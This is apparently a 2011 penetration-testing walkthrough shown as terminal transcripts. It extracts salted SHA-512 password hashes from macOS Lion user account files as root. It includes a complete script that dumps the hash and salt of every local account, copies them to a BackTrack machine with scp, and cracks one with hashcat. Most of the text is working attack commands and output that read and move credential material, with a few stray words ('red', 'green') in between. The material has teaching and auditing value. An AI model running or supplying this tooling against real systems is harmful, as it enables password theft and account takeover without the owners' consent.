bash-3.2# file /var/db/dslocal/nodes/Default/users/test.plist
/var/db/dslocal/nodes/Default/users/test.plist: Apple binary property list
bash-3.2# cp /var/db/dslocal/nodes/Default/users/test.plist .
bash-3.2# plutil -convert xml1 test.plist

. . .
<key>ShadowHashData</key>
<array>
<data>
YnBsaXN0MDDRAQJdU0FMVEVELVNIQTUxMk8QRLsEid97Bz5xXxn4P9UtCO3i
QkNVRFD3FZ3WXBACmKWCBSW1UyD0gYJJG3K0xLpQ17DigcHZjgZZGl6cYWf0
KnQvA1nHCAsZAAAAAAAAAQEAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAGA=
</data>
</array>
. . .

bash-3.2# echo " YnBsaXN0MDDRAQJdU0FMVEVELVNIQTUxMk8QRLsEid97Bz5xXxn4P9UtCO3i QkNVRFD3FZ3WXBACmKWCBSW1UyD0gYJJG3K0xLpQ17DigcHZjgZZGl6cYWf0 KnQvA1nHCAsZAAAAAAAAAQEAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAGA=" | base64 -D > ShadowHashData
bash-3.2# file ShadowHashData
ShadowHashData: Apple binary property list

bash-3.2# plutil -convert xml1 ShadowHashData
bash-3.2# more ShadowHashData
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>SALTED-SHA512</key>
<data>
uwSJ33sHPnFfGfg/1S0I7eJCQ1VEUPcVndZcEAKYpYIFJbVTIPSBgkkbcrTEulDXsOKB
wdmOBlkaXpxhZ/QqdC8DWcc=
</data>
</dict>
</plist>

bash-3.2# echo "uwSJ33sHPnFfGfg/1S0I7eJCQ1VEUPcVndZcEAKYpYIFJbVTIPSBgkkbcrTEulDXsOKB wdmOBlkaXpxhZ/QqdC8DWcc=" | base64 -D > hashfile
bash-3.2# file hashfile
hashfile: data
bash-3.2# xxd hashfile
0000000: bb04 89df 7b07 3e71 5f19 f83f d52d 08ed ....{.>q_..?.-..
0000010: e242 4355 4450 f715 9dd6 5c10 0298 a582 .BCUDP....\.....
0000020: 0525 b553 20f4 8182 491b 72b4 c4ba 50d7 .%.S ...I.r...P.
0000030: b0e2 81c1 d98e 0659 1a5e 9c61 67f4 2a74 .......Y.^.ag.*t
0000040: 2f03 59c7 /.Y.

bash-3.2# xxd -p -c 256 hashfile |wc -c
137

red

green

bash-3.2# xxd -p -c 256 hashfile | cut -c 1-8 | xxd -p -r > salt
bash-3.2# echo -n "password" > password
bash-3.2# cat salt password | shasum -b -a 512
7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7 *-
bash-3.2# xxd -p -c 256 hashfile | cut -c 9-
7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7

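#!/bin/sh
# lion-unshadow.sh - collect the SALTED-SHA512 shadow hash of every local
# account record under /var/db/dslocal/nodes/Default/users.
#
# Needs enough privilege to read those records (the transcript on this page
# runs it from a root shell).
#
# Outputs, created in the current directory (the script refuses to run when
# either one already exists):
#   salts.bin  - one line per account: the raw salt bytes (first 8 hex
#                digits of the decoded value) followed by a newline
#   hashes.txt - one line per account: the remaining 128 hex digits
# "Found hash for USER" is printed on stdout for each account written.
# Exits non-zero when an output file already exists.

# Both output files hold password-hash material, so create them readable by
# the owner only instead of inheriting whatever umask the caller has.
umask 077

# Refuse to append to the results of an earlier run.
for out in salts.bin hashes.txt
do
    if [ -f "$out" ]
    then
        echo "Exiting: $out already exists." >&2
        exit 1
    fi
done

for plist in /var/db/dslocal/nodes/Default/users/*.plist
do
    # An unmatched glob stays as the literal pattern; skip it.
    [ -f "$plist" ] || continue

    # Skip records whose file name starts with "_".
    case "${plist##*/}" in
        _*) continue ;;
    esac

    # Convert the binary plist to XML once and reuse it for both lookups.
    xml=$(plutil -convert xml1 "$plist" -o -) || continue

    # Account name: the <string> that follows <key>name</key>.
    user=$(printf '%s\n' "$xml" |
        grep --after-context=2 '<key>name</key>' |
        grep string |
        cut -f 2 -d '>' |
        cut -f 1 -d '<')

    # ShadowHashData is a base64-encoded binary plist whose <data> element
    # is itself base64; decode both layers and dump the result as hex.
    hash=$(printf '%s\n' "$xml" |
        grep --after-context=6 ShadowHashData |
        grep --after-context=3 '<data>' |
        grep -v data |
        base64 -D |
        plutil -convert xml1 - -o - |
        grep --after-context=2 '<data>' |
        grep -v data |
        base64 -D |
        xxd -p -c 133)

    # 136 hex digits = 68 bytes; anything else is not the expected record.
    if [ "${#hash}" -eq 136 ]
    then
        # NOTE(review): the salt goes through a shell variable and a
        # line-oriented file, so salt bytes such as NUL or newline would not
        # survive; the format is kept because the later steps on this page
        # read salts.bin line by line.
        salt=$(printf '%s' "$hash" | cut -c 1-8 | xxd -r -p)
        hash2=$(printf '%s' "$hash" | cut -c 9-)

        echo "Found hash for $user"
        printf '%s\n' "$salt" >> salts.bin
        printf '%s\n' "$hash2" >> hashes.txt
    fi
done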

bash-3.2# sh lion-unshadow.sh
Found hash for test
bash-3.2# cat hashes.txt
7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7
bash-3.2# xxd salts.bin
0000000: bb 0489 df0a .....

bash-3.2# scp hashes.txt salts.bin root@backtrack:
root@backtrack's password:
hashes.txt 100% 258 0.3KB/s 00:00
salts.bin 100% 10 0.0KB/s 00:00
bash-3.2# ssh root@backtrack
root@backtrack's password:
Linux backtrack 2.6.38 #1 SMP Thu Mar 17 22:59:29 EDT 2011 x86_64 GNU/Linux
root@backtrack:~# cd /pentest/passwords/hashcat
root@backtrack:/pentest/passwords/hashcat# more password.list
password
root@backtrack:/pentest/passwords/hashcat# # Now we prepend our salts to the password list . . .
root@backtrack:/pentest/passwords/hashcat# cat ~/salts.bin |while read salt; do cat password.list |while read password; do echo $salt$password >> salted.txt; done; done
root@backtrack:/pentest/passwords/hashcat# ./hashcat-cli64.bin -m 1700 ~/hashes.txt salted.txt
Initializing with 8 threads and 32mb segment-size...
NOTE: press enter for status-screen
Added hashes from file /root/hashes.txt: 2 (1 salts)
7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7:???password
Wordlist..: salted.txt
Index.....: 1/1 (segment), 2 (words), 26 (bytes)
Recovered.: 1/2 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 2/2 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--
Started: Mon Sep 5 19:46:37 2011
Stopped: Mon Sep 5 19:46:37 2011
root@backtrack:/pentest/passwords/hashcat#